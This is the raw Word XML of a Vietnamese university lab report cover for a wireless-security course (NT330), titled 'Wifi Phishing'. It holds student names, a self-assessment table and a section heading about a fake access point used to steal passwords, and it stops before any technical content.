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AA01" w14:textId="10D7D23B" w:rsidR="000911B4" w:rsidRDefault="00EF15F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65671" wp14:editId="70016479">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1254598</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-681990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="182880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BAC66" w14:textId="0A6DD0E7" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15F4" w:rsidP="00FA7958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641009"/>
                                <w:w w:val="98"/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EF15F4">
                              <w:rPr>
                                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                                <w:color w:val="641009"/>
                                <w:w w:val="98"/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve">TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TIN </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00EF15F4">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                <w:color w:val="641009"/>
                                <w:w w:val="98"/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>–</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00EF15F4">
                              <w:rPr>
                                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                                <w:color w:val="641009"/>
                                <w:w w:val="98"/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> ĐHQG-HCM</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5F21B3B9" w14:textId="77777777" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15F4" w:rsidP="001A628E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641009"/>
                                <w:w w:val="105"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EF15F4">
                              <w:rPr>
                                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="641009"/>
                                <w:w w:val="105"/>
                              </w:rPr>
                              <w:t>KHOA MẠNG MÁY TÍNH VÀ TRUYỀN TH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6567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8.8pt;margin-top:-53.7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CtXWFI4AAAAAwBAAAPAAAAAAAAAAAAAAAAAGsEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQA&#10;BADzAAAAeAUAAAAA&#10;" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="514BAC66" w14:textId="0A6DD0E7" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15F4" w:rsidP="00FA7958">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                          <w:color w:val="641009"/>
                          <w:w w:val="98"/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EF15F4">
                        <w:rPr>
                          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                          <w:color w:val="641009"/>
                          <w:w w:val="98"/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve">TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TIN </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00EF15F4">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          <w:color w:val="641009"/>
                          <w:w w:val="98"/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>–</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00EF15F4">
                        <w:rPr>
                          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                          <w:color w:val="641009"/>
                          <w:w w:val="98"/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> ĐHQG-HCM</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5F21B3B9" w14:textId="77777777" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15F4" w:rsidP="001A628E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641009"/>
                          <w:w w:val="105"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EF15F4">
                        <w:rPr>
                          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="641009"/>
                          <w:w w:val="105"/>
                        </w:rPr>
                        <w:t>KHOA MẠNG MÁY TÍNH VÀ TRUYỀN THÔ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FBE0DE" wp14:editId="61B7BFDD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-719676</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7568415" cy="3784600"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone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379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377EE" w14:textId="25A1F3C1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08DED24E" w14:textId="32145B13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39888149" w14:textId="51110276" w:rsidR="000911B4" w:rsidRDefault="00AC2289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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Av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0A54C" wp14:editId="38D3B887">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1658620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130648</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4010025" cy="7143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04273" w14:textId="77777777" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15F4" w:rsidP="00EF15F4">
                            <w:pPr>
                              <w:pStyle w:val="Title"/>
                              <w:ind w:firstLine="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                                <w:color w:val="01579B"/>
                                <w:sz w:val="44"/>
                                <w:szCs w:val="44"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EF15F4">
                              <w:rPr>
                                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                                <w:color w:val="01579B"/>
                                <w:sz w:val="44"/>
                                <w:szCs w:val="44"/>
                              </w:rPr>
                              <w:t>BÁO CÁO THỰC HÀNH</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="677DD741" w14:textId="77777777" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15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A54C" id="Text Box 17" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:130.6pt;margin-top:10.3pt;width:315.75pt;height:56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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5B104273" w14:textId="77777777" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15F4" w:rsidP="00EF15F4">
                      <w:pPr>
                        <w:pStyle w:val="Title"/>
                        <w:ind w:firstLine="0"/>
                        <w:rPr>
                          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                          <w:color w:val="01579B"/>
                          <w:sz w:val="44"/>
                          <w:szCs w:val="44"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EF15F4">
                        <w:rPr>
                          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                          <w:color w:val="01579B"/>
                          <w:sz w:val="44"/>
                          <w:szCs w:val="44"/>
                        </w:rPr>
                        <w:t>BÁO CÁO THỰC HÀNH</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="677DD741" w14:textId="77777777" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15F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3E183" w14:textId="789127BF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56B5F569" w14:textId="5C7B5730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68FB0D02" w14:textId="16CBEB84" w:rsidR="000911B4" w:rsidRDefault="00AC2289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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Av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04C66" wp14:editId="52A051F8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1242060</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>78740</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5105400" cy="7143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6F3F3" w14:textId="1F878B92" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00AC2289" w:rsidP="00EF15F4">
                            <w:pPr>
                              <w:pStyle w:val="Title"/>
                              <w:ind w:firstLine="0"/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  <w:t>NT</w:t>
                            </w:r>
                            <w:r w:rsidR="00CD1DC6"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  <w:t>330</w:t>
                            </w:r>
                            <w:r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1DC6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1DC6"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  <w:t>AN TOÀN MẠNG KHÔNG DÂY VÀ DI ĐỘNG</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="53496B0C" w14:textId="77777777" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15F4" w:rsidP="00EF15F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04C66" id="Text Box 22" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:97.8pt;margin-top:6.2pt;width:402pt;height:56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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0B86F3F3" w14:textId="1F878B92" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00AC2289" w:rsidP="00EF15F4">
                      <w:pPr>
                        <w:pStyle w:val="Title"/>
                        <w:ind w:firstLine="0"/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  <w:t>NT</w:t>
                      </w:r>
                      <w:r w:rsidR="00CD1DC6"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  <w:t>330</w:t>
                      </w:r>
                      <w:r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D1DC6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D1DC6"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  <w:t>AN TOÀN MẠNG KHÔNG DÂY VÀ DI ĐỘNG</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="53496B0C" w14:textId="77777777" w:rsidR="00EF15F4" w:rsidRPr="00EF15F4" w:rsidRDefault="00EF15F4" w:rsidP="00EF15F4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C1841" w14:textId="67508359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0D416ED1" w14:textId="246F4042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4D19BCD2" w14:textId="77777777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5B3E4AD3" w14:textId="77777777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6A62284A" w14:textId="2356F6CF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59198B99" w14:textId="77777777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501383B6" w14:textId="77777777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72089F6E" w14:textId="77777777" w:rsidR="000911B4" w:rsidRDefault="000911B4" w:rsidP="00FA7958">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
          <w:w w:val="95"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1256D11A" w14:textId="0CB9B965" w:rsidR="00FF12B3" w:rsidRPr="00AC2289" w:rsidRDefault="00A403AA" w:rsidP="00052098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
          <w:b/>
          <w:color w:val="641009"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2289">
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
          <w:b/>
          <w:color w:val="641009"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
      <w:r w:rsidR="00B13D6A">
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
          <w:b/>
          <w:color w:val="641009"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2289">
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
          <w:b/>
          <w:color w:val="641009"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00FF12B3" w:rsidRPr="00AC2289">
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
          <w:b/>
          <w:color w:val="641009"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B13D6A">
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
          <w:b/>
          <w:color w:val="641009"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Wifi Phising</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1FEA8" w14:textId="77777777" w:rsidR="00A403AA" w:rsidRPr="002E401B" w:rsidRDefault="00A403AA" w:rsidP="00052098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20EA163B" w14:textId="617AC9DB" w:rsidR="00AE28FE" w:rsidRDefault="00AE28FE" w:rsidP="00AC2289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo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604"/>
        <w:gridCol w:w="3210"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE28FE" w14:paraId="524A92C7" w14:textId="77777777" w:rsidTr="00AE28FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4815" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DE2466" w14:textId="5D022003" w:rsidR="00AE28FE" w:rsidRDefault="00AE28FE" w:rsidP="00AC2289">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">Thành </w:t>
            </w:r>
            <w:r w:rsidRPr="00D86CA4">
              <w:rPr>
                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>viên (</w:t>
            </w:r>
            <w:r w:rsidR="00B13D6A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Nhóm TH2.16</w:t>
            </w:r>
            <w:r w:rsidRPr="00D86CA4">
              <w:rPr>
                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2704199A" w14:textId="77777777" w:rsidR="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:spacing w:after="160" w:line="256" w:lineRule="auto"/>
              <w:ind w:left="567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20890 – Hoàng Văn Anh Đức</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6356F346" w14:textId="77777777" w:rsidR="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:spacing w:after="160" w:line="256" w:lineRule="auto"/>
              <w:ind w:left="567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21296 – Võ Thị Thu Cúc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="136921A6" w14:textId="16666E6F" w:rsidR="00AE28FE" w:rsidRPr="00AE28FE" w:rsidRDefault="00AE28FE" w:rsidP="00AE28FE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="567" w:firstLine="0"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433C902E" w14:textId="77777777" w:rsidR="00AE28FE" w:rsidRDefault="00AE28FE" w:rsidP="00AC2289">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3210" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblInd w:w="1267" w:type="dxa"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1717"/>
            </w:tblGrid>
            <w:tr w:rsidR="00AE28FE" w14:paraId="3F05A0CD" w14:textId="77777777" w:rsidTr="00AE28FE">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1717" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="641009"/>
                </w:tcPr>
                <w:p w14:paraId="5EE2D4AC" w14:textId="4BE3C88F" w:rsidR="00AE28FE" w:rsidRPr="00AE28FE" w:rsidRDefault="00AE28FE" w:rsidP="00AE28FE">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="567"/>
                      <w:tab w:val="left" w:pos="6480"/>
                    </w:tabs>
                    <w:spacing w:after="60"/>
                    <w:ind w:left="0" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AE28FE">
                    <w:rPr>
                      <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                      <w:bCs/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>Điểm tự đánh giá</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00AE28FE" w14:paraId="7593682D" w14:textId="77777777" w:rsidTr="00AE28FE">
              <w:trPr>
                <w:trHeight w:val="1056"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1717" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="55F6BBE7" w14:textId="6EE891F0" w:rsidR="00AE28FE" w:rsidRPr="00D36983" w:rsidRDefault="00AE28FE" w:rsidP="00AE28FE">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="567"/>
                      <w:tab w:val="left" w:pos="6480"/>
                    </w:tabs>
                    <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                    <w:ind w:left="0" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                      <w:b/>
                      <w:color w:val="641009"/>
                      <w:sz w:val="32"/>
                      <w:szCs w:val="32"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="05741B5E" w14:textId="77777777" w:rsidR="00AE28FE" w:rsidRDefault="00AE28FE" w:rsidP="00AC2289">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="604AEBF6" w14:textId="1CA5D506" w:rsidR="00DE0762" w:rsidRDefault="00DE0762" w:rsidP="00AC2289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD9EAB7" w14:textId="77777777" w:rsidR="00AC2289" w:rsidRPr="00AC2289" w:rsidRDefault="00AC2289" w:rsidP="00AC2289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
          <w:bCs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53E81775" w:rsidR="00DF782F" w:rsidRPr="00A403AA" w:rsidRDefault="00DF782F" w:rsidP="00052098">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A403AA">
              <w:t>Tổng thời gian thực hiện Lab trung bình</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6095" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D0F576A" w14:textId="03F91CC2" w:rsidR="00DF782F" w:rsidRPr="00A403AA" w:rsidRDefault="00DF782F" w:rsidP="00D86CA4">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC2289" w:rsidRPr="00A403AA" w14:paraId="0FB88FEF" w14:textId="77777777" w:rsidTr="00D86CA4">
        <w:trPr>
          <w:trHeight w:val="988"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65D795DB" w14:textId="36BABEA2" w:rsidR="00AC2289" w:rsidRPr="00A403AA" w:rsidRDefault="00AC2289" w:rsidP="00052098">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Phân chia công việc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6095" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A9CE2E1" w14:textId="77777777" w:rsidR="00AC2289" w:rsidRPr="00A403AA" w:rsidRDefault="00AC2289" w:rsidP="00D86CA4">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:ind w:firstLine="0"/>
            </w:pP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jc w:val="both"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A403AA">
              <w:t xml:space="preserve">Ý kiến </w:t>
            </w:r>
            <w:r w:rsidRPr="00A403AA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(nếu có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  <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A403AA">
              <w:t>+ Khó khăn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E3A8CC4" w14:textId="15D0069D" w:rsidR="00DF782F" w:rsidRPr="00A403AA" w:rsidRDefault="00DF782F" w:rsidP="00052098">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A403AA">
              <w:t>+ Đề xuất</w:t>
            </w:r>
            <w:r w:rsidR="00FA580A">
              <w:t>, kiến nghị</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6095" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CD217D1" w14:textId="65AFDFEE" w:rsidR="00DF782F" w:rsidRPr="00A403AA" w:rsidRDefault="00B13D6A" w:rsidP="00D86CA4">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lỗi khá nhiều khi thực hiện theo bài lab </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D62E688" w14:textId="1197F48B" w:rsidR="00A840A8" w:rsidRDefault="002724CB" w:rsidP="00D1136F">
      <w:r w:rsidRPr="00A403AA">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D242F" w14:textId="77777777" w:rsidR="003E72FD" w:rsidRPr="00A403AA" w:rsidRDefault="003E72FD" w:rsidP="00D1136F"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:eastAsia="Calibri" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto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BE02EC" w14:textId="65ABB028" w:rsidR="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Avo" w:hAnsi="UTM Avo"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0691D869" w14:textId="2427DA83" w:rsidR="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A"/>
        <w:p w14:paraId="27F68711" w14:textId="77777777" w:rsidR="00B13D6A" w:rsidRPr="00B13D6A" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A"/>
        <w:p w14:paraId="0E82F76C" w14:textId="7653C04B" w:rsidR="00CE48E2" w:rsidRDefault="007F0987"/>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2F8FBFE1" w14:textId="0337EC7A" w:rsidR="00884FA0" w:rsidRDefault="00884FA0" w:rsidP="001C481A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1377C104" w14:textId="74346EE0" w:rsidR="00377044" w:rsidRPr="00377044" w:rsidRDefault="00377044" w:rsidP="003E72FD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00377044">
        <w:lastRenderedPageBreak/>
        <w:t>BÁO CÁO CHI TIẾT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8FE3E2" w14:textId="0B25FAD4" w:rsidR="00052098" w:rsidRDefault="00B13D6A" w:rsidP="00B13D6A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Fake AP lừa người dùng kết nối đến để đánh cắp mật khẩu</w:t>
      </w:r>
    </w:p>
